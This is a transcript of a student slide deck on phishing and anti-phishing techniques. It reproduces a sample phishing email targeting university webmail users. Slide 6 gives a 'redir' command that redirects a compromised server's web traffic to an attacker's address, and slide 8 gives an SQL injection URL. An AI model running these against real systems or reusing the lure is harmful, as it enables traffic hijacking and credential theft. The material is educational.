1 / 20

Phishing and Anti-phishing techniques

Phishing and Anti-phishing techniques. Sumanth, Sanath and Anil CpSc 620. Email Message. Subject: CONFIRM YOUR ACCOUNT Reply-To: “CLEMSON.EDU SUPPORT TEAM" From: "CLEMSON.EDU SUPPORT TEAM“ Date: Tue, 1 Dec 2009 17:42:05 -0400

johnrrogers
Download Presentation

Phishing and Anti-phishing techniques

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. Phishing and Anti-phishing techniques Sumanth, Sanath and Anil CpSc 620

  2. Email Message Subject: CONFIRM YOUR ACCOUNT Reply-To: “CLEMSON.EDU SUPPORT TEAM" From: "CLEMSON.EDU SUPPORT TEAM“ Date: Tue, 1 Dec 2009 17:42:05 -0400 To: <"Undisclosed-Recipient:;"@iocaine.uits.clemson.edu> Dear CLEMSON.EDU Webmail user, This mail is to inform all our {CLEMSON.EDU } webmail users that we will be maintaining and upgrading our website in a couple of days from now to a new link. As a Subscriber you are required to click on the link below and login to check if you have access to the new link. Click Here: www.webmail.clemson.edu Failure to do this will immediately will render your email address deactivated. Thank you for using CLEMSON.EDU. CCIT SUPPORT TEAM

  3. What is Phishing? • Phishing scams are typically fraudulent email messages or websites appearing as legitimate enterprises (e.g., your university, your Internet service provider, your bank). • These scams attempt to gather personal, financial and sensitive information. • Derivation of the word “phishing”.

  4. How to phish? • Compromised Web servers – Email and IM • Port Redirection • Botnets • Key loggers

  5. Compromised Web Servers Found!! Install phishing websites Search for Vulnerable Web servers Compromised Web Server Send Bulk Email Attacker

  6. Port Redirection • Server is compromised and a program is loaded • All the port 80 ie., http requests are redirected to the attacker’s server • Software known as ‘redir’ • Execute the software using: redir --lport=80 –l addr=<IP addr orig server> -cport=80 -caddr=IP addr attacker

  7. Using Botnets • Botnets are computers infected by worms or Trojans and taken over surreptitiously by hackers and brought into networks to send spam, more viruses, or launch denial of service attacks. • Remotely controlled by the attacker. • SQL Injection attacks

  8. SQL Injection attacks http request with sql query Server Attack the server with some queries to drop the tables: http://localhost/products.asp?productId=0 or 1=1 SQL pattern matching: like '%admin%' Attacker

  9. Keyloggers • Keyloggers are designed to monitor all the key strokes • Hardware • Software • Modified to extract personal information

  10. Current Statistics Source: http://www.avira.com/

  11. Anti-phishing • Ways: • Browser Capabilites • Desktop Agents • Token based • Digitally Signed Email • Domain Monitoring Client Level Server Level Enterprise Level

  12. Browser Capabilites • Disable pop ups • Disable Java runtime support • Prevent the storage of non-secure cookies • Ensure that downloads are checked by anti-virus software • Eg: Mozilla Firefox Verification

  13. Browser Capabilites

  14. Desktop Agents • Install Anti-virus software which can prevent phishing • Personal IDS • Firewall • Toolbars – Google, Yahoo, NetCraft

  15. Token based Authentication Token based Authentation

  16. Digitally Signed Email CA Server Validate Sender’s Certificate Sender’s Cert SMTP Recipient Mail Server Sender

  17. Gmail - Verification

  18. Domain Monitoring • Monitor the registration of Internet domains relating to their organisation and the expiry of corporate domains • Google - Safe Browsing API • www.phishtank.com

  19. References • Honeynet Projecy – http://www.honeynet.org • The Phishing Guide - Understanding and Preventing Phishing attacks • Justice Department - http://www.justice.gov/ • Statistics - http://www.avira.com/ • Cross-site scripting attacks – http://www.wikipedia.org/ • Images from PayPal, Gmail • Demo - Clemson Webmail – Only for Ethical Hacking  • RSA Token Authentication - http://www.entrust.com

  20. Thank You !!!!

More Related